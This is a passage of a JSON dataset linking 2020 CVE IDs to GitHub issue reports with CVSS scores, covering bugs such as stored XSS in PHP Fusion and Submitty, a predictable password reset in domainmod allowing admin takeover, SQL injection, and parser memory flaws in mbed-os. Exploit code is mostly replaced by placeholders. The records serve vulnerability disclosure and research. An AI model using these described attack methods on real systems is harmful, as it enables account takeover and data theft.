        "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2309",
        "Repo_new": "php-fusion/PHP-Fusion",
        "Issue_Created_At": "2020-04-29T01:38:25Z",
        "description": "Cross Site Scripting Vulnerability on \"preview comment\" feature in PHP Fusion NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a stored XSS vulnerability in the \"preview comment\" feature. This was can be bypassed by using HTML event handlers, such as \"ontoggle\". To Reproduce Log into the panel. Go to PATHTAG Click edit on comment Insert payload '> APITAG View the preview to trigger XSS. View the preview to get in request and such Store XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. Screenshots FILETAG FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version of Browser NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-12725",
        "Issue_Url_old": "https://github.com/getredash/redash/issues/4869",
        "Issue_Url_new": "https://github.com/getredash/redash/issues/4869",
        "Repo_new": "getredash/redash",
        "Issue_Created_At": "2020-05-07T10:53:13Z",
        "description": "Vulnerability report: details TBA. Havoc Research has discovered a vulnerability in Redash and reported it to security APITAG This issue will be populated with details once the vendor has addressed it, or in NUMBERTAG days, whichever comes first. CVE number has been requested. Suggested CVSS NUMBERTAG ector: URLTAG NUMBERTAG Internal reference: HA NUMBERTAG C NUMBERTAG Thanks \ud83c\udf2a\ufe0f Havoc Research team",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-12735",
        "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/122",
        "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/122",
        "Repo_new": "domainmod/domainmod",
        "Issue_Created_At": "2020-05-02T05:10:09Z",
        "description": "Authentication Bypass via FILETAG . Summary : FILETAG handles \u201cresetting\u201d/changing an existing user\u2019s password. The reset functionality uses PHP\u2019s APITAG to derive the new password for the user that is attempting to change their password. This method of using APITAG to create a temporary password is very deterministic and allows an attacker to invoke the reset password functionality and reliably determine what the new password is, thus allowing for an account takeover. File Affected : FILETAG Vulnerability Details NUMBERTAG Below is an overview of the logic used by FILETAG to change a user\u2019s password. FILETAG NUMBERTAG In red is the SQL statement is used to determine the existence of a user. APITAG APITAG APITAG APITAG APITAG A user\u2019s password is changed only if the above statement returns a non empty result set. As we can see, the above SQL statement results in a row being returned if either the username or the email address exists in the database. Hence, an attacker will able to invoke a change of password (in green) as long the attacker knows a valid username NUMBERTAG Once, the user\u2019s username (email ID) is validated, the application proceeds to change the password of the user (in green). A new/temporary password is created for the user by using the first NUMBERTAG characters of the MD5 hash of the current Unix timestamp. APITAG APITAG APITAG APITAG APITAG An SQL statement is then used to update the user with the new password NUMBERTAG The problem with the aforementioned logic is that It is very easy for an attacker to determine the new password as the result of the APITAG is very deterministic and not random. Hence, this vulnerability can be exploited to change the password of a user and then reliably determine the new password. The credentials can then be used to login to the application. APITAG APITAG As, admin is a default user on the application, this vulnerability can be used to change the admin password and consequently login to the application as the said admin user. Exploit: The following python script can be used to reset/change a user\u2019s password and subsequently determine the new password. CODETAG NUMBERTAG Successful login using APITAG FILETAG NUMBERTAG Resetting the password using the above exploit code NUMBERTAG Unsuccessful login using APITAG FILETAG NUMBERTAG Successful login using newly obtained credentials admin:e NUMBERTAG edd7b FILETAG Mitigation: One suggestion is to use a cryptographically secure random number as the seed to the APITAG instead of APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12740",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/576",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/576",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2020-05-08T15:35:39Z",
        "description": "Heap overflow in APITAG Describe the bug A heap based buffer overflow was discovered in tcprewrite binary, during the get_c operation. The issue is being triggered in the function APITAG at common/get.c. To Reproduce Steps to reproduce the behavior NUMBERTAG Compile tcpreplay according to the default configuration NUMBERTAG execute command APITAG poc URLTAG can be found here. Expected behavior An attacker can exploit this vulnerability by submitting a malicious pcap that exploits this issue. This will result in a Denial of Service APITAG and potentially Information Exposure when the application attempts to process the file. Screenshots ASAN Reports ERRORTAG Debug ERRORTAG System (please complete the following information): OS version : Ubuntu NUMBERTAG Tcpreplay Version NUMBERTAG master branch",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12762",
        "Issue_Url_old": "https://github.com/rsyslog/libfastjson/issues/161",
        "Issue_Url_new": "https://github.com/rsyslog/libfastjson/issues/161",
        "Repo_new": "rsyslog/libfastjson",
        "Issue_Created_At": "2020-05-15T14:09:18Z",
        "description": "Please check if affected by CVETAG . CVETAG was reported for json c, see URLTAG Please check if libfastjson is affected by a similar problem. At least it looks like that printbuf.c changes should be backported.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-12767",
        "Issue_Url_old": "https://github.com/libexif/libexif/issues/31",
        "Issue_Url_new": "https://github.com/libexif/libexif/issues/31",
        "Repo_new": "libexif/libexif",
        "Issue_Created_At": "2020-02-18T01:59:09Z",
        "description": "division by zero in libexif/exif entry.c. The problem of dividing by zero was found during the OSS Fuzz project test. Project: libexif Fuzzer: APITAG Fuzz target binary: exif_loader_fuzzer Platform Id: linux Type of test\uff1aundefined Command: python infra/helper.py build_fuzzers sanitizer undefined libexif Results of execution\uff1a ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-12797",
        "Issue_Url_old": "https://github.com/hashicorp/consul/issues/5606",
        "Issue_Url_new": "https://github.com/hashicorp/consul/issues/5606",
        "Repo_new": "hashicorp/consul",
        "Issue_Created_At": "2019-04-04T14:35:02Z",
        "description": "ACL is not updated on remote datacenters. Overview of the Issue After updating an acl on primary site, we've noticed that changes are not replicated to remote datacenters (even few after NUMBERTAG h). In this example, we've changed the policy to allow write in kv on path \"services data overrides\". Note: This does not apply to all ACLs. Changes on other ACLs are replicated, new ACLs are replicated. Here is the detail of this acl: Updated ACL: dc1 (ACL datacenter): CODETAG Other datacenters: dc2: CODETAG dc3: ERRORTAG Writing kv in path not replicated: dc1 (acl site) CODETAG others: ERRORTAG Reproduction Steps I don't think it is simple to reproduce as it only impact some ACL (undefined root cause). Consul info for both Client and Server APITAG APITAG ACL Datacenter Server info APITAG ERRORTAG APITAG APITAG APITAG datacenter Server info APITAG ERRORTAG APITAG Operating system and Environment details OS: APITAG Linux release NUMBERTAG APITAG APITAG APITAG Versions APITAG CODETAG APITAG Log Fragments There is no log related to ACL except this mention at startup: APITAG Questions How come dc3 is still in legacy mode? Any idea why we are unable to propagate changes on this acl?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12845",
        "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1242",
        "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1242",
        "Repo_new": "cherokee/webserver",
        "Issue_Created_At": "2020-07-25T11:07:45Z",
        "description": "NULL pointer derefence during HTTP authentication. Cherokee Web Server NUMBERTAG to NUMBERTAG have a NULL pointer dereference which leads to a denial of service. Any server that has HTTP authentication (either basic or digest) enabled and paths that respond with the WWW Authenticate header, can be crashed by an unauthenticated and remote attacker by sending a malformed Authorization header to such paths. The following commands are used to generate HTTP requests that trigger the vulnerability APITAG APITAG does not allocate memory if the the size of the input string is less or equal to zero and return APITAG nonetheless. ERRORTAG APITAG and APITAG do not have any checks on the return value from APITAG and will later dereference an uninitialized pointer (read and write), at APITAG CODETAG and in a call to APITAG (illegal write at APITAG ) respectively CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12872",
        "Issue_Url_old": "https://github.com/erlyaws/yaws/issues/402",
        "Issue_Url_new": "https://github.com/erlyaws/yaws/issues/402",
        "Repo_new": "erlyaws/yaws",
        "Issue_Created_At": "2020-05-24T13:03:23Z",
        "description": "CVETAG . While going trough some CVE feeds and track the information noticed the CVE NUMBERTAG CVETAG assignment for yaws, which is from the following report URLTAG Were you informed about this?",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-12882",
        "Issue_Url_old": "https://github.com/Submitty/Submitty/issues/5266",
        "Issue_Url_new": "https://github.com/submitty/submitty/issues/5266",
        "Repo_new": "submitty/submitty",
        "Issue_Created_At": "2020-04-19T19:46:42Z",
        "description": "Security bug] Stored XSS Trigger for TA by user account. Describe the bug APITAG vulnerability can potentially enable any student to takeover the account of TA if they open the attachment as the cookie gets exposed._ A student logged in via username/password student:student has the ability to submit submissions for grading. This can be then viewed by TA from their account via ta:ta . When they click on the file for grading, stored xss gets triggered. Expected behavior .svg files must be stopped from getting uploaded by any student during submissions. To Reproduce Steps to reproduce the behavior NUMBERTAG As student login, via student:student NUMBERTAG Go here URLTAG (as e NUMBERTAG In the new submission upload the .svg file. The svg file can be created by saving as .svg Github doesn't allow attacing svg and neither its code so here is the [link URLTAG to create a sample malicious svg file NUMBERTAG Login as ta and open the same for grading. The XSS gets triggered alerting the cookies. Screenshots APITAG APITAG Additional context We may try to block .svg files from uploading and also try to drop the Content Type: image/svg+xml. Adding content disposition: attachment as mentioned here URLTAG may help for the mitigation.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-12883",
        "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12925",
        "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12925",
        "Repo_new": "armmbed/mbed-os",
        "Issue_Created_At": "2020-05-05T20:59:22Z",
        "description": "Out of range memory access in APITAG APITAG library parser. Description of defect References: URLTAG FILETAG File: FILETAG CODETAG Analysis: If a packet with option delta lower than NUMBERTAG is parsed, the remaning message length is incorrectly calculated in the line: URLTAG The packet data pointer is not incremented prior to the remaining message length calculation and therefore it does not account for the option byte. This allows a malformed message with not option value following to pass through message length check in the line: URLTAG For short options length the remaining message length is unchanged after option lengh processing: URLTAG Allowing to pass throught final message length check: URLTAG In option processing code the packet data pointer is incremented beyond the input buffer boundary and passed for further processing, e.g. in: URLTAG The invalid pointer is then accessed by functions called from option processing code, e.g. in: URLTAG Type: Integer Overflow or Wraparound Out of bounds Read Result: Parsing data out of input bounds Possible crash due out of bound memory access Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12883",
        "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12927",
        "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12927",
        "Repo_new": "armmbed/mbed-os",
        "Issue_Created_At": "2020-05-05T21:04:21Z",
        "description": "Out of range memory access in APITAG APITAG library parser option value length. Description of defect References: URLTAG FILETAG File: FILETAG CODETAG Analysis: If a packet with option length equal to NUMBERTAG or NUMBERTAG is set with no extended option length following, access beyond the provided packet buffer is made due to insufficient message length checks: URLTAG Before option length processing the message left bytes is calculated including the option delta/option length byte: URLTAG In case of option length set to NUMBERTAG the extended delta length is accessed in the following line without prior check for buffer out of bound condition: URLTAG In case of option length set to NUMBERTAG the extended length bytes are accessed with insufficient out of boudnds condition checks. As the message_left variable includes the option length byte, the check will pass malformed frame if there is only one extended length byte following: URLTAG Type: Integer Overflow or Wraparound Out of bounds Read Result: Parsing data out of input bounds Possible crash due out of bound memory access Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12883",
        "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12926",
        "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12926",
        "Repo_new": "armmbed/mbed-os",
        "Issue_Created_At": "2020-05-05T21:02:26Z",
        "description": "Out of range memory access in APITAG APITAG library parser option number. Description of defect References: URLTAG FILETAG File: FILETAG CODETAG Analysis: If a packet with option delta equal to NUMBERTAG or NUMBERTAG is parsed with no extended option delta following, access beyond the packet data buffer is made due to insufficient message length checks: URLTAG Before option number processing the message left bytes is calculated including the option delta/option length byte: URLTAG In case of option delta set to NUMBERTAG the extended delta byte is accessed in the following line without prior check for buffer out of bound index: URLTAG In case of option delta set to NUMBERTAG the extended delta bytes are accessed with insufficient index check. As the message_left variable includes the option delta byte, the check will pass malformed frame if there is only one extended delta byte following: URLTAG Type: Integer Overflow or Wraparound Out of bounds Read Result: Parsing data out of input bounds Possible crash due out of bound memory access Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12884",
        "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12928",
        "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12928",
        "Repo_new": "armmbed/mbed-os",
        "Issue_Created_At": "2020-05-05T21:05:47Z",
        "description": "Out of range memory access in APITAG APITAG library parser APITAG Description of defect References: URLTAG FILETAG File: FILETAG CODETAG Analysis: If a packet with malformed URI Query option is provided as input, the parser reads out of the provided input packet memory area. URLTAG The packet_data_pptr is accessed after being incremented by option_len without prior out of bound memory check. The temp_parsed_uri_query_ptr is validated for correct range, but the range valid for temp_parsed_uri_query_ptr is derived from the amount of allocated heap memory, not the input size. Therefore the check of temp_parsed_uri_query_ptr may be insufficient for safe access to the area pointed by packet_data_pptr. URLTAG Type: Integer Overflow or Wraparound Out of bounds Read Result: Parsing data out of input bounds Possible crash due out of bound memory access Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12885",
        "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12929",
        "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12929",
        "Repo_new": "armmbed/mbed-os",
        "Issue_Created_At": "2020-05-05T21:08:59Z",
        "description": "Infinite loop in APITAG APITAG library parser. Description of defect References: URLTAG FILETAG File: FILETAG CODETAG Analysis: If a packet with an option processed by APITAG function and declared zero option length is encountered, the parser enters an infinite loop. Example entry point with zero length option_len: URLTAG Together with message_left equal to NUMBERTAG this results in zero length needed heap calculation result: URLTAG With zero length heap allocation the function exits early without entering the main processing loop: URLTAG Which leaves ( packet_data_pptr) unmodified, pointing at the same option which leads to APITAG looping over the same option in an infinite loop. Type: Remote Denial Of Service Excessive resources usage (CPU time) System overload Result: The procedure loops infinitely Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12886",
        "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12948",
        "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12948",
        "Repo_new": "armmbed/mbed-os",
        "Issue_Created_At": "2020-05-08T18:10:34Z",
        "description": "Out of range memory access in APITAG APITAG library parser token length not validated. Description of defect References: URLTAG FILETAG File: FILETAG Analysis: If a packet with declared token length larger than actually provided is parsed, read out of the provided input buffer boundaries may occur. Invalid memory access may occur in APITAG as there is no check to verify if the arguments are within input buffer boundaries: URLTAG Type: Out of bounds Read Result: Parsing data out of input bounds Possible crash due out of bound memory access Patch proposal: URLTAG Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12887",
        "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12957",
        "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12957",
        "Repo_new": "armmbed/mbed-os",
        "Issue_Created_At": "2020-05-11T21:04:23Z",
        "description": "Memory leak in APITAG APITAG library parser APITAG Description of defect References: URLTAG FILETAG File: FILETAG Example Trace NUMBERTAG Byte leak): ERRORTAG Example Trace (double NUMBERTAG Byte leak): ERRORTAG Analysis: If a packet with multiple options with the same effective option number, but with non zero delta is processed it may lead to memory leak. This issue is related to: URLTAG The parser assumes in APITAG that options with the same number can occur only adjacent to each other using zero delta after the first option with a given number. This is not true due to integer overflow in option number addition which makes it possible to craft a packet with multiple options resulting in the same option number in arbitrary order. In conjunction with lack of verification of pointers to allocated memory before rewriting the pointer with newly allocated space it may lead to memory leak due to memory buffer orphaning. Integer overflow is described in detail in: URLTAG uint NUMBERTAG ariable overflow can happen at: URLTAG and URLTAG If more than one occurence of option with the same number is encountered by APITAG the APITAG may allocate new memory buffer and overwrite pointer pointing to previously allocated memory space in: URLTAG or URLTAG or URLTAG or URLTAG As a result the previously allocated buffer is orphaned and never freed. Patch proposal: URLTAG Type: Integer Overflow or Wraparound Memory leak / heap exhaustion Result: Excessive memory usage Possible crash due to lack of resources Denial of Service Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. ERRORTAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12887",
        "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12930",
        "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12930",
        "Repo_new": "armmbed/mbed-os",
        "Issue_Created_At": "2020-05-05T21:10:48Z",
        "description": "Integer overflow in APITAG APITAG library parser. Description of defect References: URLTAG FILETAG File: FILETAG Analysis: Unhandled option length variable roll over occurs if extended option length encoding is used with NUMBERTAG length encoded. The frame is further processed with the result of integer roll over. URLTAG Type: Integer Overflow or Wraparound Result: Undetected malformed frame Incorrect packet parsing Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? N/A",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13118",
        "Issue_Url_old": "https://github.com/adeoluwa-adebiyi/Mikrotik-Router-Monitoring-System/issues/4",
        "Issue_Url_new": "https://github.com/adeoluwa-adebiyi/mikrotik-router-monitoring-system/issues/4",
        "Repo_new": "adeoluwa-adebiyi/mikrotik-router-monitoring-system",
        "Issue_Created_At": "2020-05-16T17:52:00Z",
        "description": "Security issue: SQL injection. Vulnerability type: SQL injection vulnerability code: in file ERRORTAG : ERRORTAG Parameter $community exists in sql injection. poc: ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13121",
        "Issue_Url_old": "https://github.com/Submitty/Submitty/issues/5265",
        "Issue_Url_new": "https://github.com/submitty/submitty/issues/5265",
        "Repo_new": "submitty/submitty",
        "Issue_Created_At": "2020-04-19T16:32:45Z",
        "description": "APITAG Bug] Open Redirection Vulnerability at Login Page. Describe the bug It is possible to redirect a user to an attacker owned domain and trick the user. I am investigating on the potential chaining of this bug to perform other attacks. Expected behavior Redirection to external urls must not be allowed. To Reproduce This occurs at the main login page when the user enters an invalid username/password. The url gets changed to APITAG An attacker can change the url(to any attacker owned domain which may mimic submitty interface) to something like APITAG and trick redirection to google.com users after they enter their creds. Additional context This can be prevented either by NUMBERTAG Adding regex checks on url and whitelisting the url NUMBERTAG Completely removing GET request based url redirection. I am trying to fix this but thought to create this issue for others to contribute the fix if interested.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-13128",
        "Issue_Url_old": "https://github.com/manolo/gwtupload/issues/33",
        "Issue_Url_new": "https://github.com/manolo/gwtupload/issues/33",
        "Repo_new": "manolo/gwtupload",
        "Issue_Created_At": "2020-02-17T21:17:42Z",
        "description": "Upload delay resulting in APITAG There is a vulnerability which allows to perform APITAG attack against the application server. The problem lies in handling delay parameter when upload is initiated ( APITAG ). Value from this parameter is used as an argument for APITAG invocation. Malicious user can specify even max integer value NUMBERTAG which would cause a thread to sleep for almost NUMBERTAG days ( APITAG ). Additionally, the value from delay parameter is assigned the field which in case of servlets behaves as a global variable. It means every further request will use this value and also will be put to sleep. Putting a thread to sleep excludes it from a limited set of available threads, so after a suitable number of upload requests APITAG by default has limit of NUMBERTAG threads) the whole application will become unresponsive and will not accept any new requests. FILETAG ERRORTAG FILETAG ERRORTAG The same way the servlet accepts APITAG parameter, but its abuse will only prevent from uploading files; the server won't suffer.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13163",
        "Issue_Url_old": "https://github.com/ConradIrwin/em-imap/issues/25",
        "Issue_Url_new": "https://github.com/conradirwin/em-imap/issues/25",
        "Repo_new": "conradirwin/em-imap",
        "Issue_Created_At": "2020-05-18T21:43:41Z",
        "description": "Security vulnerability: missing SSL hostname validation. APITAG Security Lab (GHSL) Vulnerability Report: APITAG The FILETAG team has identified potential security vulnerabilities in em imap URLTAG . We are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team. If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at APITAG (please include your APITAG ). If you are _NOT_ the correct point of contact for this report, please let us know! Summary Missing hostname validation allows an attacker to perform a man in the middle attack against users of the library. Product em imap Tested Version NUMBERTAG Missing SSL/TLS certificate hostname validation em imap URLTAG uses the library eventmachine URLTAG in an insecure way that allows an attacker to perform a man in the middle attack against users of the library. Impact An attacker can assume the identity of a trusted server and introduce malicious data in an otherwise trusted place. Remediation Implement hostname validation. Resources To trigger the vulnerability, a simple TLS enabled listening daemon is sufficient as described in the following snippets. CODETAG Create a sample client with the following contents: ERRORTAG Run the example client to see a connection being performed in the listening daemon initialized in the previous steps. APITAG References FILETAG APITAG Security Advisories We recommend you create a private APITAG Security Advisory URLTAG for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are published URLTAG . Credit This issue was discovered and reported by GHSL team member MENTIONTAG APITAG Gianni) URLTAG . Contact You can contact the GHSL team at APITAG , please include the APITAG in any communication regarding this issue. Disclosure Policy This report is subject to our coordinated disclosure policy URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 5.2,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-13225",
        "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/3025",
        "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/3025",
        "Repo_new": "phpipam/phpipam",
        "Issue_Created_At": "2020-05-17T10:45:44Z",
        "description": "Stored XSS in User Instructions Widget. Within the Edit User Instructions field where you can enter source code you are able to generate scripting that then executes in the user's browser when they click on the instructions page. POC: APITAG Additionally, APITAG will also execute scripting in the browser. POC video is available here: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-13226",
        "Issue_Url_old": "https://github.com/wso2/product-apim/issues/7677",
        "Issue_Url_new": "https://github.com/wso2/product-apim/issues/7677",
        "Repo_new": "wso2/product-apim",
        "Issue_Created_At": "2020-03-10T05:23:03Z",
        "description": "Deploy endpoint validation API in API Gateway. Describe your problem(s) Currently, the API endpoint validation ( APITAG ) in the Publisher portal is happening via direct HTTP Head call initiated from the Publisher node. This is less secure when the Publisher node has direct access to other services in the same private network layer. Describe your solution Make endpoint validation request goes through WSO2 API Gateway. How will you implement it Deploy the API APITAG by default for each tenant in API Gateway. If needed, provide admin users with the capability to set rate limiting as well, so that request bursting will be prevented.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13226",
        "Issue_Url_old": "https://github.com/wso2/docs-apim/issues/816",
        "Issue_Url_new": "https://github.com/wso2/docs-apim/issues/816",
        "Repo_new": "wso2/docs-apim",
        "Issue_Created_At": "2020-03-10T05:34:53Z",
